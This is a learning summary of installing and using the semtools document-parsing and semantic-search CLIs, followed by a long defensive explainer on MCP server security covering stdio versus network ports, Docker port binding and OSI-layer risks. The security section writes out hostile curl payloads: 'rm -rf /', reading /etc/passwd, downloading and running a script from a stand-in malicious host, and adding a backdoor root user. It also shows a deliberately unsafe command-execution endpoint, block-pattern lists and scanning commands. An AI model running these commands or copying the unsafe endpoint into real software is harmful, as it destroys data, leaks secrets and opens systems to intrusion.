# Semtools and MCP Learning Summary ## Semtools Installation and Setup ### Installation Process 1. **Initial Challenge**: Required Rust/Cargo version supporting Edition 2024 - Original version: Cargo 1.68.2 (outdated) - Solution: Updated to Cargo 1.89.0 via `rustup update` 2. **Installation Command**: ```bash cargo install semtools ``` 3. **Installed Executables**: - `parse` - Document parsing tool (located at `~/.cargo/bin/parse`) - `search` - Semantic search tool (located at `~/.cargo/bin/search`) ### Parse Tool Configuration #### Configuration File Location - Path: `~/.parse_config.json` #### Required Configuration Structure ```json { "api_key": "your_llama_cloud_api_key_here", "num_ongoing_requests": 10, "base_url": "https://api.cloud.llamaindex.ai", "check_interval": 5, "max_timeout": 3600, "max_retries": 10, "retry_delay_ms": 1000, "backoff_multiplier": 2.0, "parse_kwargs": { "parse_mode": "parse_page_with_agent", "model": "openai-gpt-4-1-mini", "high_res_ocr": "true", "adaptive_long_table": "true", "outlined_table_extraction": "true", "output_tables_as_HTML": "true" } } ``` #### Key Configuration Learnings - All fields are mandatory - missing any field causes errors - Requires LlamaParse API key from cloud.llamaindex.ai - Parse output is saved to `~/.parse/[filename].md` - Supports advanced PDF parsing with OCR and table extraction ### Using Semtools #### Parse Command ```bash # Basic usage parse "filename.pdf" # With verbose output parse --verbose "filename.pdf" # Help parse --help ``` **Features**: - Converts PDFs to markdown format - Extracts tables as HTML - Handles complex layouts with AI assistance - Preserves document structure #### Search Command ```bash # Basic semantic search search "query terms" "file.md" # With context lines search "query" "file.md" -n 5 # Top-k results search "query" "file.md" --top-k 5 # Help search --help ``` **Features**: - Semantic search (finds contextually relevant content) - Returns similarity scores (lower = better match) - Shows context around matches - Supports multiple files/directories ### Practical Examples Performed #### Example 1: Parsing the CompanyA PDF **Command Used:** ```bash parse "CompanyA - Intro H2 2024.pdf" ``` **Result:** Successfully parsed to `/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md` **Sample Parsed Content:** ```markdown # INTRODUCTION COMPANYA UK ## THE COMPANY AND PORTFOLIO AT A GLANCE ## COMPANYA | AT A GLANCE > We specialise in creating software for a wide range of industries and technologies, actively playing a part in the digitisation of Europe. > With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago. ## GROUP REVENUE 2023 - approx. **1.1 B. Euros** ## NUMEROUS AWARDS | Year | Award / Recognition | |-------|---------------------------------------------| | 2023 | Data, Analytics & AI Market Leader | | 2020 | [Award logo shown] | ``` #### Example 2: Semantic Search for Awards **Command Used:** ```bash search "awards achievements recognition excellence" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" ``` **Results Found:** ``` /Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:446::453 (0.4192522861034296) ## Awards shown on trophies - Beste Arbeitgeber ITK Great Place To Work 2020 /Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:27::34 (0.639156086580848) ## NUMEROUS AWARDS | Year | Award / Recognition | |-------|---------------------------------------------| | 2023 | Data, Analytics & AI Market Leader | ``` #### Example 3: Financial Performance Search **Command Used:** ```bash search "1.1 billion euros revenue" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" --top-k 5 ``` **Results Found:** ``` /Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:21::28 (0.5080750291633499) ## GROUP REVENUE 2023 - approx. **1.1 B. Euros** /Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:10::17 (0.7265656264502557) > With a dedicated team of over **10,000 EMPLOYEES** (CompanyA Group | Feb. 2024) across Europe, we have recently broadened our scope to include the UK market, starting just one year ago. ``` #### Example 4: Company Positioning Search **Command Used:** ```bash search "speed boat agility flexibility enterprise scalability" "/Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md" -n 5 ``` **Key Result Found:** ``` /Users/mondweep/.parse/CompanyA - Intro H2 2024.pdf.md:183::194 (0.4164071779051679) > CompanyA combines the professionalism and scalability of a large IT company with the agility and flexibility of a small IT service provider and thus offers you ... > * ...a pronounced **service provider mentality**! > * ...solution-oriented services with optimal **benefits**! > * ...pragmatic, **fast solutions** and hands-on mentality! > * ...a very high service quality designed for **speed**! > * ...extraordinary **flexibility** in cooperation! > * ...fast and variable **scalability** in the services - both OnShore and with CompanyA SmartShore! **WE JUST DO IT!** ``` ### Key Discoveries from Parsed Content **Company Overview:** - Founded 1997 in Germany, became CompanyA SE in 2019 - Over 10,000 employees across Europe - €1.1 billion revenue (2023) - 64 locations in Europe & UK **Major Clients Found:** ``` COMMERZBANK, DEUTSCHE BUNDESBANK, Bayern LB, Munich RE, MAN, DAIMLER, vodafone, T-Mobile, SwissLife, ZURICH, AOK, BARMER, Union Investment ``` **Industry Services Table Extracted:** ```html
Automotive Banking Health Insurance Life Sciences Manufacturing Industry Public Retail Utilities
``` **Unique Value Proposition Discovered:** The company positions itself as combining "Speed Boat" agility with "Big Player" enterprise capabilities - offering both the flexibility of a small service provider and the scalability of a large corporation. ## MCP (Model Context Protocol) Security Insights ### Why Terminal Access MCP is Unsafe 1. **Unrestricted Command Execution** - Can execute ANY system command - Same privileges as running user - Direct file system access 2. **No Sandboxing** - Runs directly on host system - No container/VM isolation - Can affect other processes 3. **Security Risks** - Privilege escalation potential - Remote code execution vector - Data exfiltration capabilities - Lack of audit trails ### Safer MCP Usage Patterns #### 1. Read-Only Operations ```json { "tools": [ {"name": "read_file", "permissions": "read-only"}, {"name": "list_directory", "permissions": "read-only"} ] } ``` #### 2. Containerization ```bash docker run --read-only \ --security-opt=no-new-privileges \ --cap-drop=ALL \ --user=nobody \ mcp-server ``` #### 3. Whitelisted Commands ```javascript { "allowed_commands": [ "git status", "npm list", "python --version" ], "blocked_patterns": [ "rm -rf", "sudo", "curl | bash" ] } ``` #### 4. Use Stdio Mode (Recommended) ```bash # Safer - uses stdio pipes npx @modelcontextprotocol/server-name # Riskier - exposes network port npx @modelcontextprotocol/server-name --port 3000 ``` ### Best Practices for MCP 1. **Default Deny Policy**: Block everything by default, explicitly allow needed operations 2. **Principle of Least Privilege**: Run with minimal necessary permissions 3. **Comprehensive Logging**: Audit all operations 4. **Use Trusted Servers**: Stick to official/verified MCP implementations 5. **Rate Limiting**: Prevent abuse through request limits 6. **Approval Workflows**: Require confirmation for sensitive operations ### Safe MCP Configuration Example ```json { "mcp_servers": { "filesystem": { "command": "npx", "args": ["@modelcontextprotocol/server-filesystem", "/safe/directory"], "permissions": { "read": true, "write": false, "execute": false } }, "memory": { "command": "npx", "args": ["@modelcontextprotocol/server-memory"], "sandboxed": true } } } ``` ### Why Exposing Port 3000 (or Any Port) is Risky #### 1. **Network Attack Surface** When you expose a port like 3000: ```bash # RISKY - Creates network listener npx @modelcontextprotocol/server-name --port 3000 ``` This opens port 3000 to network connections, meaning: - Any process on your machine can connect - If firewall is misconfigured, external attackers could connect - Creates a persistent network service that can be discovered - Enables port scanning and service enumeration #### 2. **Localhost Still Has Risks** Even binding to `127.0.0.1:3000` isn't completely safe: - Other local processes can connect (including malware) - Browser-based attacks via JavaScript `fetch()` or XHR - Port scanning by local malicious software - Shared systems allow other users to connect - No built-in authentication on most MCP servers #### 3. **Common Misconfiguration Dangers** ```bash # VERY DANGEROUS - Binds to all interfaces npx server --port 3000 --host 0.0.0.0 # Docker mistake - Exposes to internet! docker run -p 3000:3000 mcp-server # Exposed externally! ``` #### 4. **Missing Security Controls** Network-exposed MCP servers typically lack: - Authentication mechanisms - Rate limiting - Request validation - Access controls - Encryption (HTTP vs HTTPS) #### 5. **Protocol Vulnerabilities** HTTP/TCP protocols over network can suffer from: - Man-in-the-middle attacks - Request injection - Buffer overflow exploits - Protocol confusion attacks - Session hijacking #### 6. **Real-World Attack Scenarios** **Scenario 1: Malware Exploitation** ```bash # Malware discovers open port 3000 curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}' ``` **Scenario 2: Browser-Based Attack** ```javascript // Malicious website exploits local MCP server fetch('http://127.0.0.1:3000/api/files') .then(data => sendToAttacker(data)) ``` **Scenario 3: Docker Misconfiguration** ```dockerfile # DANGEROUS - Exposes to internet EXPOSE 3000 # Running with -p 3000:3000 makes it public! ``` #### Why Stdio Mode is Safer ```bash # SAFE - Uses stdio pipes, no network npx @modelcontextprotocol/server-name ``` **Stdio advantages:** - **No network exposure** - only parent process can communicate - **Process isolation** - communication through pipes only - **Automatic cleanup** - dies when parent process exits - **OS-level security** - leverages process permissions - **No port scanning** - invisible to network tools - **No remote access** - physically impossible to connect remotely #### Network Security Best Practices (If Ports Are Required) 1. **Bind to Localhost Only** ```bash npx server --port 3000 --host 127.0.0.1 ``` 2. **Use Unix Domain Sockets Instead** ```bash # Better than TCP ports npx server --socket /tmp/mcp.sock chmod 600 /tmp/mcp.sock # Restrict permissions ``` 3. **Add Authentication Layer** ```javascript { "auth": { "type": "bearer", "token": "secure-random-token" } } ``` 4. **Implement Rate Limiting** ```javascript { "rate_limit": { "requests_per_minute": 60, "max_connections": 5 } } ``` 5. **Use TLS/SSL for Encryption** ```bash # Use HTTPS instead of HTTP npx server --port 3000 --cert server.crt --key server.key ``` #### Architecture Comparison **Network Mode (Risky):** ``` Claude Code → Network Stack → Port 3000 → MCP Server ↑ ↑ Attacker Port Scanner ``` **Stdio Mode (Safe):** ``` Claude Code ←→ Stdio Pipes ←→ MCP Server (Process Isolation) ``` #### Key Principle **Avoid network protocols when local IPC (Inter-Process Communication) suffices.** Network exposure should only be used when absolutely necessary and with proper security controls. ### Deep Dive: Why `docker run -p 3000:3000` Exposes to Internet This is a critical concept that catches many developers off-guard. Let's break down exactly why this seemingly innocent command creates internet exposure: #### How Docker's `-p` Flag Works The `-p` (or `--publish`) flag creates port mapping from host to container: ```bash -p [host_port]:[container_port] -p 3000:3000 ↑ ↑ | └── Port inside the container └── Port on your host machine (YOUR COMPUTER) ``` #### The Critical Detail: Default Binding Behavior **By default, `-p 3000:3000` binds to `0.0.0.0:3000` on your host**, which means: ```bash # What you type: docker run -p 3000:3000 mcp-server # What Docker actually does: docker run -p 0.0.0.0:3000:3000 mcp-server ↑ └── ALL network interfaces! ``` #### What `0.0.0.0` Actually Means - `0.0.0.0` = "bind to all available network interfaces" - This includes: - `127.0.0.1` (localhost/loopback) - Your WiFi IP (e.g., `192.168.1.100`) - Your Ethernet IP - **Your public IP address if directly connected** #### Internet Exposure Scenarios **1. Cloud/VPS Servers** ```bash # Running on AWS, Azure, DigitalOcean, etc. docker run -p 3000:3000 mcp-server # Now accessible at: http://your-server-public-ip:3000 # Anyone on the internet can connect! ``` **2. Home Networks with Port Forwarding** ```bash # Your router forwards port 3000, or has DMZ enabled # Your service becomes accessible from outside your network ``` **3. Corporate Networks** ```bash # Many corporate networks have direct routing # Port 3000 becomes accessible to entire corporate network # Could violate security policies ``` #### Real Attack Scenario ```bash # You innocently run: docker run -p 3000:3000 mcp-server # Attacker from anywhere can now: curl http://your-public-ip:3000/execute \ -d '{"command": "cat /etc/passwd"}' curl http://your-public-ip:3000/files \ -d '{"action": "list", "path": "/"}' ``` #### How to Run Docker Safely **Option 1: Explicit Localhost Binding (Recommended)** ```bash # SAFE - Only accessible from your machine docker run -p 127.0.0.1:3000:3000 mcp-server ↑ └── Explicitly bind to localhost only ``` **Option 2: Use Docker Networks (Most Secure)** ```bash # SAFE - Internal Docker network only, no external ports docker network create mcp-network docker run --network mcp-network --name mcp-server mcp-server docker run --network mcp-network my-app # Containers can talk to each other, but no external access ``` **Option 3: Unix Domain Sockets** ```bash # SAFE - Filesystem-based communication docker run -v /tmp:/tmp mcp-server --socket /tmp/mcp.sock # No network exposure at all ``` #### How to Check If You're Currently Exposed ```bash # Check what's listening on port 3000 netstat -an | grep 3000 # OR ss -tulpn | grep 3000 # If you see this, you're EXPOSED: tcp 0.0.0.0:3000 *:* LISTEN # BAD - listening on all interfaces # If you see this, you're SAFE: tcp 127.0.0.1:3000 *:* LISTEN # GOOD - localhost only ``` #### Scan for Exposed Services ```bash # Check from external perspective nmap your-public-ip # If port 3000 shows up, you're exposed! # Check Docker port mappings docker port container-name # Shows all port mappings for container ``` #### Common Dangerous Misunderstandings 1. **"It's just Docker, it's contained"** - Docker doesn't add security by default - `-p` flag explicitly breaks container isolation 2. **"I'm behind NAT/firewall"** - NAT isn't a security boundary - Many routers have UPnP that auto-opens ports - Docker can modify firewall rules automatically 3. **"It's just for development/testing"** - Attackers continuously scan for development services - Test servers often have weaker security - "Temporary" often becomes permanent 4. **"My cloud provider protects me"** - Most cloud instances have public IPs - Security groups/firewalls must be explicitly configured - Default configurations often allow wide access #### Docker Security Best Practices **1. Never Use Default Port Binding in Production** ```bash # NEVER do this in production: docker run -p 3000:3000 app # Always specify bind address: docker run -p 127.0.0.1:3000:3000 app ``` **2. Use Docker Networks for Inter-Container Communication** ```bash # Create isolated network docker network create --driver bridge app-network # Run containers on network docker run --network app-network api-server docker run --network app-network database # No external ports needed! ``` **3. Implement Reverse Proxy Pattern** ```bash # Only expose reverse proxy (nginx, traefik) docker run -p 127.0.0.1:80:80 nginx docker run --network internal-network app1 docker run --network internal-network app2 # Apps not directly accessible from outside ``` **4. Use Environment-Specific Configurations** ```yaml # docker-compose.yml version: '3' services: mcp-server: # Development ports: - "127.0.0.1:3000:3000" # Safe local binding # Production networks: - internal # No external ports ``` #### Firewall Interaction Warning Docker manipulates iptables rules automatically: ```bash # Docker adds rules that can bypass your firewall! # Check what Docker added: iptables -L DOCKER # Docker rules often come BEFORE your custom rules # Your firewall config might be ignored! ``` #### The Bottom Line **`docker run -p 3000:3000` is equivalent to running a public web server.** It tells Docker to accept connections from **anywhere on the internet** and forward them to your container. Unless you explicitly specify `127.0.0.1`, Docker assumes you want global accessibility. This is why: - Stdio mode is preferred for MCP servers (no network at all) - If ports are needed, always bind to `127.0.0.1:port` - Never omit the bind address in production - Use Docker networks for internal communication - Regularly audit your exposed ports with `netstat` or `nmap` **Remember: Convenience is the enemy of security. Always be explicit about network exposure.** ### Understanding Attack Commands: The `-d` Flag in curl Many of the attack examples in this document use curl with the `-d` flag. Understanding what this flag does is crucial for comprehending the security risks: #### What the `-d` Flag Does The `-d` flag in curl stands for "**data**" and is used to send HTTP POST data in the request body: ```bash curl http://127.0.0.1:3000/execute -d '{"command": "rm -rf /"}' ↑ ↑ | └── POST data (JSON payload) └── Target URL ``` #### Technical Breakdown 1. **HTTP Method**: `-d` automatically changes the request from GET to POST 2. **Content-Type**: Sets `Content-Type: application/x-www-form-urlencoded` by default 3. **Request Body**: Places the data in the HTTP request body 4. **JSON Data**: The string becomes the POST payload sent to the server #### The HTTP Request Generated ```http POST /execute HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/x-www-form-urlencoded Content-Length: 25 {"command": "rm -rf /"} ``` #### What `rm -rf /` Actually Does This is one of the most destructive commands possible on Unix/Linux systems: - `rm` = remove/delete command - `-r` = recursive (delete directories and all their contents) - `-f` = force (don't prompt for confirmation, ignore nonexistent files) - `/` = root directory (the entire filesystem) **Translation**: "Delete everything on the system without asking for confirmation" #### Real-World Impact of This Attack If an MCP server executes this command, the results are catastrophic: - **Operating System**: Completely destroyed - **All Applications**: Deleted permanently - **User Data**: Gone forever (documents, databases, configurations) - **System Recovery**: Impossible without complete restoration from backups - **Server Status**: Completely bricked and unusable - **Business Impact**: Complete system downtime, potential data loss #### Other Dangerous Commands via `-d` ```bash # Exfiltrate sensitive data curl -d '{"command": "cat /etc/passwd"}' http://127.0.0.1:3000/execute # Download and execute malware curl -d '{"command": "curl malicious-site.com/malware.sh | bash"}' url # Create backdoor access curl -d '{"command": "echo \"hacker::0:0::/root:/bin/bash\" >> /etc/passwd"}' url # Steal environment variables (often contain secrets) curl -d '{"command": "env"}' http://127.0.0.1:3000/execute # Access private keys curl -d '{"command": "find /home -name \"*.key\" -o -name \"id_rsa\""}' url ``` #### Other curl `-d` Flag Variations ```bash # Send JSON with proper content-type curl -d '{"key": "value"}' -H "Content-Type: application/json" url # Send form data curl -d "username=admin&password=secret" url # Send from file curl -d @malicious-payload.json url # Multiple data parameters curl -d "field1=value1" -d "field2=value2" url # URL encode data curl -d "message=hello%20world" url ``` #### Why These Examples Are So Effective 1. **No Authentication**: Most development MCP servers have no authentication 2. **Full Privileges**: MCP servers often run with the same privileges as the user 3. **Direct Execution**: Commands execute immediately without validation 4. **No Logging**: Many servers don't log incoming commands 5. **Network Accessible**: `-p 3000:3000` makes them reachable from anywhere #### The Security Lesson The `-d` flag itself is completely innocent - it's just a way to send data with HTTP POST requests. The danger comes from: 1. **Unsecured Endpoints**: Servers that execute any command without validation 2. **Network Exposure**: Making these endpoints accessible over the network 3. **Lack of Input Validation**: Not sanitizing or restricting incoming commands 4. **Missing Authentication**: No verification of who is sending commands 5. **Excessive Privileges**: Running servers with unnecessary system access #### Defense Against These Attacks **1. Never Expose Command Execution Endpoints** ```bash # DON'T create endpoints like: /execute /command /run /shell ``` **2. Use Whitelisted Operations Instead** ```json { "allowed_operations": [ "get_status", "list_files", "read_config" ], "blocked_operations": ["execute", "command", "shell"] } ``` **3. Input Validation and Sanitization** ```javascript // Validate incoming data if (data.command.includes('rm -rf')) { throw new Error('Destructive command blocked'); } // Use command whitelists const allowedCommands = ['git status', 'npm version']; if (!allowedCommands.includes(data.command)) { throw new Error('Command not allowed'); } ``` **4. Run with Minimal Privileges** ```bash # Create restricted user useradd --no-create-home --shell /bin/false mcp-user # Run server as restricted user sudo -u mcp-user node mcp-server.js ``` **5. Use Stdio Mode (Eliminates Network Attacks)** ```bash # SAFE - No network exposure possible npx @modelcontextprotocol/server-name # DANGEROUS - Network exposed npx @modelcontextprotocol/server-name --port 3000 ``` #### Key Takeaway **The `-d` flag is just the delivery mechanism. The real danger is having network-accessible endpoints that execute arbitrary commands without proper security controls.** This is why stdio mode is strongly recommended for MCP servers - it eliminates the entire network attack surface. ## STDIO Mode vs Network Protocols: OSI Model Deep Dive Understanding why STDIO mode is fundamentally safer requires understanding the difference between **Inter-Process Communication (IPC)** and **network protocols** in the context of the OSI model. ### STDIO Mode Explained **STDIO (Standard Input/Output) mode** uses operating system pipes for communication instead of network sockets: ```bash # STDIO Mode (SAFE) - Uses OS pipes npx @modelcontextprotocol/server-name # Network Mode (RISKY) - Uses TCP/IP sockets npx @modelcontextprotocol/server-name --port 3000 ``` ### OSI Model Attack Surface Comparison #### Network Mode - Full OSI Stack Exposure Network-based MCP servers traverse the complete OSI stack, creating attack surfaces at every layer: ``` ┌─────────────────────────────────────────┐ │ Layer 7: Application (HTTP, MCP Protocol) │ ← Command injection attacks ├─────────────────────────────────────────┤ │ Layer 6: Presentation (JSON encoding) │ ← Data manipulation attacks ├─────────────────────────────────────────┤ │ Layer 5: Session (HTTP sessions) │ ← Session hijacking ├─────────────────────────────────────────┤ │ Layer 4: Transport (TCP) │ ← Port scanning, DoS attacks ├─────────────────────────────────────────┤ │ Layer 3: Network (IP routing) │ ← IP spoofing, routing attacks ├─────────────────────────────────────────┤ │ Layer 2: Data Link (Ethernet) │ ← ARP poisoning, MAC spoofing ├─────────────────────────────────────────┤ │ Layer 1: Physical (Network interface) │ ← Physical network access └─────────────────────────────────────────┘ ``` #### STDIO Mode - Zero Network Stack Involvement STDIO mode completely bypasses the network stack, operating at the OS process level: ``` ┌─────────────────────────────────────────┐ │ Application Layer (MCP Protocol) │ ← Only accessible to parent process ├─────────────────────────────────────────┤ │ Operating System IPC (Pipes) │ ← Protected by process isolation ├─────────────────────────────────────────┤ │ Kernel System Calls │ ← OS enforces access controls ├─────────────────────────────────────────┤ │ Process Management │ ← Cannot be accessed remotely └─────────────────────────────────────────┘ ``` ### Communication Flow Comparison #### Network Mode Communication Path ```bash # Network mode creates this communication path: Claude Code ──→ TCP Socket ──→ Network Stack ──→ Port 3000 ──→ MCP Server │ │ │ │ │ Layer 7 Layer 4 Layers 3-1 Layers 4-7 Layer 7 # Attack vector exists: Attacker ──→ Internet ──→ Your Network ──→ Port 3000 ──→ MCP Server ``` #### STDIO Mode Communication Path ```bash # STDIO mode creates this isolated path: Claude Code ──→ Process Fork ──→ OS Pipes ──→ MCP Server │ │ │ │ Parent Process Child Process OS IPC Child Process # NO network layers involved! # Attacker has NO path to reach MCP Server ``` ### Inter-Process Communication (IPC) vs Network Protocols #### IPC Mechanisms (All Local, Secure) **STDIO pipes are one form of IPC. All IPC mechanisms are local-only:** ```c // Simplified view of STDIO pipe creation int pipe_fd[2]; pipe(pipe_fd); // Creates bidirectional pipe between processes // Parent (Claude Code) writes to pipe write(pipe_fd[1], "get status", 10); // Child (MCP Server) reads from pipe read(pipe_fd[0], buffer, 10); // This communication is invisible to network tools // No external process can intercept or inject data ``` **Other IPC Mechanisms (All Safe):** - **Pipes** (STDIO mode uses these) - **Named pipes (FIFOs)** - Filesystem-based pipes - **Unix domain sockets** - Local socket files - **Shared memory** - Direct memory sharing - **Message queues** - OS-managed message passing - **Semaphores** - Process synchronization #### Network Protocols (Can Be Remote, Dangerous) **Network sockets are designed for remote access:** ```c // Network socket creation (dangerous for MCP) int sock = socket(AF_INET, SOCK_STREAM, 0); // Internet socket struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(3000), .sin_addr.s_addr = INADDR_ANY // 0.0.0.0 - ALL interfaces! }; bind(sock, (struct sockaddr*)&addr, sizeof(addr)); listen(sock, 5); // Ready to accept connections // This socket can accept connections from: // - localhost (127.0.0.1) // - Local network (192.168.x.x) // - Internet (any public IP) // - Docker containers // - VPN connections ``` ### Process Isolation Model (STDIO) STDIO mode creates strong process isolation enforced by the operating system: ```bash ┌──────────────────┐ Pipes ┌──────────────────┐ │ Claude Code │◄──────────►│ MCP Server │ │ (Parent) │ │ (Child) │ │ PID: 1234 │ │ PID: 1235 │ │ User: alice │ │ User: alice │ └──────────────────┘ └──────────────────┘ ▲ ▲ │ │ │ OS Process Management │ ┌────▼────────────────────────────────▼────┐ │ Operating System Kernel │ │ • Enforces process boundaries │ │ • Manages pipe permissions │ │ • Prevents external access │ │ • Cleans up on process death │ └─────────────────────────────────────────┘ ``` ### Security Properties of Each Approach #### STDIO Mode Security Properties ```bash ✅ Process Isolation: Communication only between parent/child ✅ No Network Exposure: Cannot be reached from network ✅ Automatic Cleanup: Dies when parent process exits ✅ OS Access Control: Kernel enforces permissions ✅ No Port Scanning: Invisible to network discovery ✅ No Remote Access: Physically impossible to connect remotely ✅ Firewall Irrelevant: No network traffic to filter ✅ No Authentication: Not needed - process isolation provides security ``` #### Network Mode Security Weaknesses ```bash ❌ Network Exposure: Accessible from network interfaces ❌ Port Discovery: Can be found via port scanning ❌ Authentication Gap: Often lacks proper auth mechanisms ❌ Firewall Dependency: Security depends on external firewall config ❌ Protocol Attacks: Vulnerable to HTTP/TCP-level attacks ❌ Remote Accessibility: Can be reached from internet if misconfigured ❌ Persistent Service: Continues running independently ❌ Multi-layer Risk: Attack surface across all OSI layers ``` ### Practical Code Examples #### STDIO Mode Implementation (Secure) **Programming Language Note**: *The following example is written in **JavaScript** for the **Node.js** runtime environment. Node.js is a JavaScript runtime that allows JavaScript to run on servers and desktops (not just in web browsers). It provides APIs for system operations like spawning processes and file management.* ```javascript // How Claude Code securely spawns MCP server via STDIO const { spawn } = require('child_process'); // Spawn child process with stdio pipes const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], { stdio: ['pipe', 'pipe', 'pipe'] // stdin, stdout, stderr pipes }); // Secure communication via pipes mcpServer.stdin.write(JSON.stringify({ method: "get_status", id: 1 }) + '\n'); // Receive response via stdout pipe mcpServer.stdout.on('data', (data) => { const response = JSON.parse(data.toString()); console.log('Secure response:', response); }); // Process automatically dies when Claude Code exits // NO NETWORK INVOLVEMENT AT ANY LEVEL // Other processes cannot access this communication channel ``` **Code Explanation for Non-JavaScript Readers:** ```javascript // Line-by-line breakdown: // 1. Import Node.js module for creating child processes const { spawn } = require('child_process'); // ↑ Destructuring assignment (extracts 'spawn' function) // ↑ CommonJS module import (Node.js style) // 2. Create a new child process running the MCP server const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], { // ↑ Variable to hold process reference // ↑ Command to run ('npx' - Node package executor) // ↑ Arguments passed to the command stdio: ['pipe', 'pipe', 'pipe'] // Configure input/output streams // ↑ stdin ↑ stdout ↑ stderr (standard streams) }); // 3. Send data TO the child process via its input stream mcpServer.stdin.write(JSON.stringify({ // ↑ stdin = standard input (pipe TO child) // ↑ Convert JavaScript object to JSON string method: "get_status", // JavaScript object with method name id: 1 // and request ID }) + '\n'); // Add newline character (message delimiter) // 4. Listen FOR data FROM the child process via its output stream mcpServer.stdout.on('data', (data) => { // ↑ stdout = standard output (pipe FROM child) // ↑ Event listener pattern // ↑ Arrow function (ES6 syntax) const response = JSON.parse(data.toString()); // ↑ Convert received bytes to string, then parse JSON console.log('Secure response:', response); // ↑ Print to console (like printf, print, echo in other languages) }); ``` **Key JavaScript/Node.js Concepts:** 1. **`require()`**: Node.js way to import modules (like `import` in Python or `#include` in C) 2. **`const`**: Creates a constant variable (immutable reference) 3. **`spawn()`**: Node.js function to create child processes 4. **`stdio`**: Configuration for Standard Input/Output streams 5. **`.write()`**: Method to send data through a pipe 6. **`.on()`**: Event listener pattern (similar to callbacks) 7. **Arrow functions `=>`**: Modern JavaScript function syntax 8. **`JSON.stringify()`/`JSON.parse()`**: Convert between objects and JSON strings **Equivalent Concepts in Other Languages:** ```python # Python equivalent (conceptual) import subprocess import json # Spawn child process with pipes process = subprocess.Popen( ['npx', '@modelcontextprotocol/server-memory'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) # Send data to child request = json.dumps({"method": "get_status", "id": 1}) + "\n" process.stdin.write(request.encode()) # Read response from child response_data = process.stdout.readline() response = json.loads(response_data.decode()) print("Secure response:", response) ``` ```bash # Bash equivalent (conceptual) # Start MCP server in background with pipes npx @modelcontextprotocol/server-memory & SERVER_PID=$! # Send request via echo and pipe echo '{"method": "get_status", "id": 1}' | npx @modelcontextprotocol/server-memory # The pipes are automatically managed by the shell ``` **Why This Code is Secure:** - **No network ports**: Uses process pipes, not TCP/UDP sockets - **Process isolation**: Only parent can communicate with child - **Automatic cleanup**: Child dies when parent exits - **OS-level protection**: Kernel enforces access controls - **No external visibility**: Cannot be discovered by network tools #### Network Mode Implementation (Vulnerable) ```javascript // Dangerous network-based MCP server const express = require('express'); const { exec } = require('child_process'); const app = express(); app.use(express.json()); // DANGEROUS: Command execution endpoint app.post('/execute', (req, res) => { const { command } = req.body; // NO INPUT VALIDATION // NO AUTHENTICATION // NO RATE LIMITING exec(command, (error, stdout, stderr) => { res.json({ output: stdout, error: stderr }); }); }); // EXPOSES TO ALL NETWORK INTERFACES app.listen(3000, '0.0.0.0', () => { console.log('MCP server exposed on port 3000'); // Attack vectors now available: // - Same machine: curl localhost:3000 // - Local network: curl 192.168.1.100:3000 // - Internet: curl your-public-ip:3000 // - Container networks: curl container-ip:3000 }); ``` ### Attack Surface Analysis by OSI Layer #### Network Mode - Vulnerabilities at Each Layer ```bash # Layer 7 (Application): - Command injection via HTTP POST - Authentication bypass - Input validation failures - Protocol confusion attacks # Layer 6 (Presentation): - JSON parsing vulnerabilities - Encoding manipulation - Data format attacks # Layer 5 (Session): - Session hijacking - Connection state attacks - Keep-alive exploitation # Layer 4 (Transport): - TCP port scanning - Connection flooding (DoS) - Sequence number attacks - Port exhaustion # Layer 3 (Network): - IP address spoofing - Routing table attacks - Man-in-the-middle attacks - Network reconnaissance # Layer 2 (Data Link): - ARP cache poisoning - MAC address spoofing - Switch flooding attacks # Layer 1 (Physical): - Network cable tapping - WiFi interception - Network infrastructure attacks ``` #### STDIO Mode - Zero Network Attack Surface ```bash # Operating System Level: ✅ Process isolation prevents external access ✅ Pipe permissions enforced by kernel ✅ No network protocols involved ✅ Cannot be discovered by network scanning ✅ Automatic resource cleanup on parent exit # The only attack vector: - Compromise the parent process (Claude Code) - But this doesn't create NEW attack surface - Parent process security is already critical ``` ### Network Discovery and Scanning #### How Network Mode Can Be Discovered ```bash # Port scanning reveals network services nmap -p 1-65535 target-ip # Output shows: 3000/tcp open # Service fingerprinting nmap -sV -p 3000 target-ip # May reveal: "Node.js Express framework" # HTTP service enumeration curl -v http://target-ip:3000 # Reveals endpoints and server information # Automated vulnerability scanning nikto -h http://target-ip:3000 sqlmap -u "http://target-ip:3000/execute" --data="command=test" ``` #### STDIO Mode Is Invisible to Network Tools ```bash # Port scanning shows nothing nmap -p 1-65535 target-ip # No additional open ports from MCP server # Process scanning (requires local access) ps aux | grep mcp # Shows process but no network binding # Network connection scanning netstat -tulpn | grep mcp ss -tulpn | grep mcp # No network listeners from MCP server ``` ### Real-World Analogy #### Network Mode = Public Payphone ``` Your Network MCP Server ≈ Public payphone on busy street Characteristics: ❌ Anyone can walk up and use it ❌ No authentication required to access ❌ Accessible 24/7 from public area ❌ Can be discovered by scanning the area ❌ Vulnerable to physical tampering ❌ Conversations can be overheard ❌ Location is publicly known ``` #### STDIO Mode = Private Intercom System ``` Your STDIO MCP Server ≈ Private intercom between two secured rooms Characteristics: ✅ Only connected rooms can communicate ✅ No external access possible ✅ Cannot be discovered from outside ✅ Automatic disconnection when rooms close ✅ Private, encrypted communication channel ✅ No public presence or discoverability ✅ Dies when building is vacated ``` ### Performance Comparison #### STDIO Mode Performance Benefits ```bash # Communication path: Application → System Call → Kernel → Pipes → Target Process # Advantages: ✅ No network stack overhead ✅ No TCP/IP processing ✅ No network serialization/deserialization ✅ Direct memory-to-memory communication ✅ Kernel-optimized pipe performance ✅ No network latency or jitter ``` #### Network Mode Performance Overhead ```bash # Communication path: Application → System Call → Kernel → Network Stack → Network Interface → Physical Network → ... → Target Process # Disadvantages: ❌ Full network stack processing required 